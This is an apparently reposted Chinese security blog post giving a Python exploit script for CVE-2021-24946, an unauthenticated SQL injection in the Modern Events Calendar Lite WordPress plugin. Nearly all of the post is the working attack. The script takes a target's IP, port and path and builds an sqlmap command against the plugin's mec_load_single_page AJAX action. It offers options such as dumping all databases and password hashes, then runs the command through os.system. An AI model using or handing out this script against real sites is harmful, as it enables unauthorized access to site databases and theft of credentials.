WordPress 现代活动日历 6.1 SQL 注入

Khan安全团队

发布于 2022-03-03 09:19:21

5460

发布于 2022-03-03 09:19:21

文章被收录于专栏：Khan安全团队

# 版本：<= 6.1

# 测试环境：Ubuntu 20.04

# CVE：CVE-2021-24946

# CWE：CWE-89

# 文档：https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md

'''

描述：

6.1.5 之前的 Modern Events Calendar Lite WordPress 插件不会清理和转义时间参数

在 mec_load_single_page AJAX 操作中的 SQL 语句中使用它之前，未经身份验证的用户可用，

导致未经身份验证的 SQL 注入问题

'''

banner = '''

 .oOOOo.  o      'O o.OOoOoo                                                                                   
.O     o  O       o  O                 .oOOo. .oOOo. .oOOo.  oO             .oOOo. o   O  .oOOo. o   O  .oOOo. 
o         o       O  o                      O O    o      O   O                  O O   o  O    o O   o  O      
o         o       o  ooOO                   o o    O      o   o                  o o   o  o    O o   o  o      
o         O      O'  O       ooooooooo     O' o    o     O'   O   ooooooooo     O' OooOOo `OooOo OooOOo OoOOo. 
O         `o    o    o                    O   O    O    O     o                O       O       O     O  O    O 
`o     .o  `o  O     O                  .O    o    O  .O      O              .O        o       o     o  O    o 
 `OoooO'    `o'     ooOooOoO           oOoOoO `OooO' oOoOoO OooOO           oOoOoO     O  `OooO'     O  `OooO' 
                                                                                                               
                                                        [+] Modern Events Calendar Lite SQL-Injection
                                                        [@] Developed by Ron Jost (Hacker5preme)

'''

print(banner)

import requests
import argparse
from datetime import datetime
import os

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH


# Exploit:
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '
exploitcode_risk = ' -p time'
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url +  retrieve_mode + exploitcode_risk
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

本文系转载，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

sql